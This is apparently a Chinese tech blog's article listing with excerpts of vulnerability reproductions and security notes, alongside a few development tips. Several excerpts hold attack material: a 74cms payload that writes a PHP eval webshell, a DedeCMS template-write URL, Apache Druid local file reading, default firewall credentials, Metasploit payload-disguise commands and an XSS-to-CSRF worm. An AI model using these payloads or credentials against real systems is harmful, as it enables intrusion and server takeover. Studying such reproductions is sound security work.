- 博客(27)
- 收藏
- 关注
原创 jar 反编译修改在反编译回去
在下面的jareditor才可以修改,修改后点击save然后在点击Build Jar。使用idea的插件JarEditor可以直接实现。
2025-04-07 17:54:08
237
原创 修改VSCode运行python文件时,终端打开的默认地址
vscode安装完python时可能会遇到默认环境指向打开文件夹的根目录而不是python文件在的目录。搜索python.exe,点勾就可以。
2025-04-07 16:35:56
180
原创 npm发包
不过撤包推荐用法: npm unpublish的推荐替代命令:npm deprecate [@] 使用这个命令,并不会在社区里撤销你已有的包,但会在任何人尝试安装这个包的时候得到警告 例如:npm deprecate z-tool '这个包我已经不再维护了哟~'终端执行 npm unpublish 例如: 1、npm unpublish z-tool@1.0.0 删除某个版本 2、npm unpublish z-tool --force 删除整个npm市场的包。,比如是淘宝源,请切换。
2025-02-14 15:13:07
754
原创 Haiyun background management system - there is a csrf caused by the promotion of permissions
【代码】Haiyun background management system - there is a csrf caused by the promotion of permissions。
2025-02-07 11:04:49
190
原创 【漏洞复现】(CVE-2024-1086)Linux内核中提权漏洞CVE-2024-1086
# 影响范围以下版本的Linux内核受该漏洞影响:该漏洞不适用于内核配置 `CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y` 且 Linux 内核版本 > 6.4 的系统。## 检查是否受漏洞影响### 1. 检查当前Linux内核版本在终端运行以下命令,查看当前内核版本:uname -a。
2024-07-01 15:54:47
3405
8
原创 使用python的selenium库进行对url进行批量访问和截图
这是使用python的selenium库进行对url的批量访问和截图。代码第一次写,也就处于勉强能跑,轻喷。
2023-07-11 15:25:46
1280
1
原创 红日靶场二
目标主机所在的网络存在域环境,域名为de1ay.com,存在两台域主机WEB和PC,域控制器为DC.de1ay.com,主机名为DC,域管理员为Administrator。跟靶场一中的环境类似需要模拟内网和外网两个网段, PC端虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。发现有双网卡,10.10.10.1/24和192.168.239.2网段,域控IP 10.10.10.10。注意WEB的这台服务器,切换用户 de1ay,密码也是1qaz@WSX。
2023-03-28 19:52:31
784
原创 红日靶场五
总结现在的到的信息 有一个域sum,域内两台主机一台win7,一台dc,DC的ip为:192.168.138.138,win7双网卡:192.168.235.101、192.168.138.136。其中域控制器DC.sun.com,域管理员为Administrator。有上面信息收集可知域用户和域为用户可以填任意一个,域为sum.com。也可以用 shell whoami /user 获取sid。看到需要用户名,域和域sid,krbtgt的哈希。使用蚁剑连接之后我上传了冰蝎。thinkphp框架。
2023-03-28 19:50:46
266
原创 python实现的一个简单端口扫描器基于udp协议实现
UDP扫描发送空的(没有数据)UDP报头到每个目标端口。如果返回ICMP端口不可到达错误(类型3,代码3), 该端口是closed(关闭的)。其它ICMP不可到达错误(类型3, 代码1,2,9,10,或者13)表明该端口是filtered(被过滤的)。偶尔地,某服务会响应一个UDP报文,证明该端口是open(开放的)。使用方法...
2022-06-17 10:30:30
1144
原创 网际互联及OSI七层模型和三次握手四次挥手
物理层、数据链路层、网络层、传输层、会话层、表示层、应用层先来复习下TCP报文首部首部的格式。1.源端口和目的端口(Source Port和Destination Port):分别占用2个字节,用于区别主机中的不同进程,而IP地址是用来区分不同的主机的,源端口号和目的端口号配合上IP首部中的源IP地址和目的IP地址就能唯一的确定一个TCP连接。2.序号seq(Sequence Number):占4个字节,用来标识从TCP发端向TCP收端发送的数据字节流(tcp传输的每一个字节都按顺序编号),它表示在这个报文
2022-06-09 22:27:06
310
原创 msf命令
常用命令总结execute执行文件execute #在目标机中执行文件execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt"-d 在目标主机执行时显示的进程名称(用以伪装)-m 直接从内存中执行"-o hack.txt"是payload.exe的运行参数migrate进程迁移getpid # 获取当前进程的p...
2022-05-19 21:07:27
2470
原创 OWASP top10 漏洞
1.sql注入原理:SQL 注入就是指 web 应用程序对用户输入的数据合法性没有过滤或者是判断,前端传入的参数是攻击者可以控制,并且参数带入数据库的查询,攻击者可以通过构造恶意的 sql 语句来实现对数据库的任意操作。分类:1、报错注入2、bool 型注入3、延时注入4、宽字节注入防御:1.使用预编译语句,绑定变量2.使用存储过程3.使用安全函数4.检查数据类型1.获取数据库名select SCHEMA_NAME from information_schema.SCHEMA.
2022-04-20 09:17:14
14574
原创 Apache Druid LoadData 任意文件读取漏洞
漏洞简介由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTPInputSource 来绕过应用程序级别的限制。攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。0x01 漏洞复现FOFA指纹:title="Apache Druid"1 在网站首页左上角点击Load data在点击在url处执行命令file:///etc/passwd0x02 漏洞POC和脚本
2022-04-11 12:16:14
249
原创 启明星辰 天清汉马USG防火墙(后台弱口令/任意用户权限)
fofa语句:title="天清汉马USG防火墙"默认账号密码账号:useradmin密码:venus.user到后台后,进入管理员页面修改访问权限,即可使用该用户
2022-04-11 12:14:19
9992
原创 泛微OA V8 SQL注入漏洞和文件上传漏洞
fofa语句app="泛微-协同办公OA"SQL注入在泛微OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法。其中它存在四个参数,分别为空字符串、cmd参数值、request对象以及serverContext对象,通过对cmd参数值进行判断,当cmd值等于getSelectAllId时,再从请求中获取sql和type两个参数值,并将参数传递进getSelectAllIds
2022-04-11 12:13:22
13999
1
原创 从致远OA-ajax.do未授权文件上传漏洞复现
打开网站任何测试它有没有未授权文件上传http://xxx/seeyon/thirdpartyController.do.css/…;/ajax.do通过抓取数据包,可以看到如下的数据请求和返回结构:返回状态404返回notfound然后直接poc这个jspx的马是在网上找到http://x.x.x.x/seeyon/autoinstall.do/..;/ajax.do?method=ajaxAction&managerName=formulaManage
2022-04-11 12:12:07
9755
原创 74cms
下载好源码php网站源码下载_php招聘网站源码_php网站模版_骑士cms人才系统然后安装,安装好之后发送poc:http://127.0.0.1/74cms//index.php?m=home&a=assign_resume_tplPOST: variable=1&tpl=<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[x]);?>")?>; ob_flush();?>/r/n
2022-04-11 12:10:55
1784
原创 DEDEC CMS v5.7 文件上传
首先我们要进入后台密码账号都是admin访问/dede/tpl.php?action=upload,审查源码,获取我们的token值。可以用taken值直接文件上传拿到token值后构造dede/tpl.php?filename=shell.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=c12bf4a8330732e9f45a492d54399803然后访问http:
2022-04-11 12:10:05
2340
原创 帝国CMS7.5漏洞复现
首先去它的后台http://127.0.0.1/upload/e/admin/index.php账号密码root依次 -> [系统]-[系统设置]-[备份与恢复数据]-[备份数据]抓包把tablename改为phpifno()注意这里只勾选一个就行了然后点击备份开始抓包将tablename改为phpifno然后放包看到这里就是刚刚的数据查看备份说明然后将文件目录下的config.php,将readme.txt改为config.php
2022-04-11 12:09:26
2670
原创 xss和csrf在dvwa中实现蠕虫攻击
验证csrf漏洞我们先在自己这里改密码然后看到上面有显示我们将上面的复制下来改为http://127.0.0.1/DVWA-master/vulnerabilities/csrf/?password_new=111111&password_conf=111111&Change=Change#访问成功修改 测试一下成功验证xss漏洞有xss漏洞然后实现xss和csrf的蠕虫攻击在xss存储型那里写入<img src="h
2022-04-10 20:27:43
575
原创 SQL注入思维导图
SQL 危害 危害数据库里的数据 直接危害到网站的权限(需要满足条件) WEB源码 目录结构 后台目录 模板目录 数据库目录 数据库配置文件 ......... 脚本类型 ASP PHP ASPX JSP JAVAWEB Python .......... 应用分类 门户 电商 论坛 博客 第三方 其他
2022-04-10 20:25:20
1431
原创 HTTP请求(GET与POST区别)和响应
HTTP有两部分组成:请求与响应,下面分别整理。一.HTTP请求1.HTTP请求格式:<request line><headers><blank line>[<request-body>]在HTTP请求中,第一行必须是一个请求行(request line),用来说明请求类型、要访问的资源以及使用的HTTP版本。紧接着是一个首部(header)小节,用来说明服务器要使用的附加信息。在首部之后是一个空行,再此之后可以添加任意的其...
2022-04-10 20:19:16
952
原创 文件上传的一些简单绕过
文件上传过宝塔WAF0x00:写在前面0x01:上传绕过后缀检测的姿势方法1:文件名14.\np\nh\np绕过(如下0x02的方法1所示)方法2:0a污染就能传php了(改hex)0x02:绕过宝塔waf检测的文件内容书写方法1:文件名14.\np\nh\np绕过,用个deskop.ini做一下污染 写马。deskop.ini污染,就是类似windows dos窗口下制作图片🐎一样,二进制揉在一起。POST /sandbox/i9pkda6liup7jd81u
2022-04-10 20:16:54
2206
原创 phpmyadmin页面getshell
来到phpmyadmin页面后如何getshell呢?下面介绍两种方法0x01 select into outfile直接写入1、利用条件对web目录需要有写权限能够使用单引号(root) 知道网站绝对路径(phpinfo/php探针/通过报错等) secure_file_priv没有具体值2、查看secure_file_priv值show global variables like '%secure%';关于secure_file_
2022-04-10 20:11:21
2489
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人